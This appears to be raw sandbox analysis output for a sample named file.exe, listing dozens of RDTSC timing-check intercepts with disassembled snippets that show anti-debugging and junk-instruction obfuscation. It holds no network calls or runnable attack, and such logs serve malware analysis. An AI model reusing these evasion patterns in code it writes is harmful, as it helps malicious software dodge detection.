Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3D3A second address: 7B3D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 jbe 00007F6B3885AF12h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6157 second address: 7B615B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8039 second address: 7B803E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B80D6 second address: 7B80EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6B38DFD06Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8469 second address: 7B846F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8579 second address: 7B8582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8582 second address: 7B8591 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8591 second address: 7B8596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B877E second address: 7B8788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F6B3885AF06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8788 second address: 7B87A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD073h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B90D9 second address: 7B90E3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6B3885AF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B928F second address: 7B92AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F6B38DFD068h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B92AA second address: 7B92F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F6B3885AF08h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 and edi, dword ptr [ebp+122D384Bh] 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b jmp 00007F6B3885AF13h 0x00000030 push eax 0x00000031 push edx 0x00000032 push ebx 0x00000033 pop ebx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B92F3 second address: 7B92F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BA0E3 second address: 7BA0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F6B3885AF0Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BAB56 second address: 7BAB60 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6B38DFD066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BA0F3 second address: 7BA0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BB3C6 second address: 7BB3CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BAB60 second address: 7BAB66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BA0F7 second address: 7BA0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BB3CC second address: 7BB3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BAB66 second address: 7BAB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BAB6A second address: 7BAB6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BBC57 second address: 7BBC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD45B second address: 7BD45F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BFE4D second address: 7BFE67 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6B38DFD068h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6B38DFD06Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BFE67 second address: 7BFF1A instructions: 0x00000000 rdtsc 0x00000002 js 00007F6B3885AF0Ch 0x00000008 jo 00007F6B3885AF06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov esi, edx 0x00000013 mov esi, 2349E330h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F6B3885AF08h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov di, 0A54h 0x00000038 or esi, dword ptr [ebp+122D38D3h] 0x0000003e je 00007F6B3885AF0Ch 0x00000044 mov esi, dword ptr [ebp+122D359Eh] 0x0000004a push 00000000h 0x0000004c push 00000000h 0x0000004e push edx 0x0000004f call 00007F6B3885AF08h 0x00000054 pop edx 0x00000055 mov dword ptr [esp+04h], edx 0x00000059 add dword ptr [esp+04h], 0000001Dh 0x00000061 inc edx 0x00000062 push edx 0x00000063 ret 0x00000064 pop edx 0x00000065 ret 0x00000066 adc esi, 553FE052h 0x0000006c xchg eax, ebx 0x0000006d push esi 0x0000006e jmp 00007F6B3885AF15h 0x00000073 pop esi 0x00000074 push eax 0x00000075 jng 00007F6B3885AF1Eh 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007F6B3885AF10h 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C12E7 second address: 7C12EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C12EB second address: 7C12EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C12EF second address: 7C1304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6B38DFD06Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C19CE second address: 7C19F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jl 00007F6B3885AF06h 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 jne 00007F6B3885AF0Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C19F7 second address: 7C19FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C3A20 second address: 7C3A92 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6B3885AF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c jnc 00007F6B3885AF09h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F6B3885AF08h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F6B3885AF08h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a or ebx, 2AF930F1h 0x00000050 adc bx, E69Eh 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 push ecx 0x0000005a pop ecx 0x0000005b pushad 0x0000005c popad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C078E second address: 7C0794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4AD1 second address: 7C4ADB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6B3885AF0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4ADB second address: 7C4B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jno 00007F6B38DFD089h 0x0000000d nop 0x0000000e and di, C4A1h 0x00000013 push 00000000h 0x00000015 jmp 00007F6B38DFD073h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f je 00007F6B38DFD06Ch 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1B90 second address: 7C1B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6A8F second address: 7C6A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7A38 second address: 7C7A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7A3C second address: 7C7AB5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F6B38DFD068h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 jnl 00007F6B38DFD06Ch 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F6B38DFD068h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 and ebx, dword ptr [ebp+122D3285h] 0x0000004a push 00000000h 0x0000004c pushad 0x0000004d sub dword ptr [ebp+122D3558h], ebx 0x00000053 mov ecx, dword ptr [ebp+122D2EBAh] 0x00000059 popad 0x0000005a push eax 0x0000005b pushad 0x0000005c push ecx 0x0000005d push eax 0x0000005e pop eax 0x0000005f pop ecx 0x00000060 jo 00007F6B38DFD06Ch 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5B97 second address: 7C5B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5B9C second address: 7C5BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6C63 second address: 7C6C69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6C69 second address: 7C6C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7C24 second address: 7C7C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7C2B second address: 7C7C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CBA14 second address: 7CBA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CBA18 second address: 7CBA1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CBA1C second address: 7CBA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CBA24 second address: 7CBA29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CBFDF second address: 7CC06F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F6B3885AF08h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 or dword ptr [ebp+1247E25Ah], edx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F6B3885AF08h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 jmp 00007F6B3885AF0Bh 0x0000004e push 00000000h 0x00000050 mov edi, 7FAF3593h 0x00000055 xchg eax, esi 0x00000056 jbe 00007F6B3885AF0Eh 0x0000005c jbe 00007F6B3885AF08h 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F6B3885AF0Ch 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CCF28 second address: 7CCF39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B38DFD06Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CD1F4 second address: 7CD1F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C9BCE second address: 7C9BE1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6B38DFD06Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE2C9 second address: 7CE2CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE2CD second address: 7CE2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE2D3 second address: 7CE2DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6B3885AF06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1134 second address: 7D1138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D030A second address: 7D030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D030F second address: 7D03BA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6B38DFD07Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d xor edi, 667CF08Fh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jmp 00007F6B38DFD077h 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 sub dword ptr [ebp+122D2F32h], ebx 0x0000002c mov eax, dword ptr [ebp+122D0045h] 0x00000032 xor di, FB74h 0x00000037 push FFFFFFFFh 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F6B38DFD068h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 add edi, 571F558Ah 0x00000059 nop 0x0000005a push edi 0x0000005b jmp 00007F6B38DFD075h 0x00000060 pop edi 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D03BA second address: 7D03C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6B3885AF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D03C4 second address: 7D03CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D218C second address: 7D2192 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78008F second address: 7800A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 js 00007F6B38DFD066h 0x0000000c jno 00007F6B38DFD066h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D765E second address: 7D7662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D7662 second address: 7D7668 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DCD20 second address: 7DCD2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F6B3885AF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DCD2C second address: 7DCD32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DCFCD second address: 7DCFDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F6B3885AF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DD112 second address: 7DD116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E500C second address: 7E5011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5011 second address: 7E503B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD070h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F6B38DFD071h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5292 second address: 7E5296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5296 second address: 7E52D8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop ebx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F6B38DFD06Ah 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F6B38DFD077h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jo 00007F6B38DFD06Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E52D8 second address: 7E52DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E52DC second address: 7E52E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F6B38DFD066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E52E6 second address: 7E52EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E53C3 second address: 7E53C9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E53C9 second address: 7E53F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F6B3885AF06h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F6B3885AF18h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E53F1 second address: 7E53FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B38DFD06Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EB429 second address: 7EB45F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF15h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F6B3885AF0Ch 0x00000014 je 00007F6B3885AF06h 0x0000001a jc 00007F6B3885AF0Ch 0x00000020 jl 00007F6B3885AF06h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EB45F second address: 7EB479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B38DFD075h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EBB93 second address: 7EBB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EBB97 second address: 7EBB9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EBCE6 second address: 7EBD04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B3885AF18h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EBD04 second address: 7EBD1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F6B38DFD06Ch 0x00000008 js 00007F6B38DFD066h 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
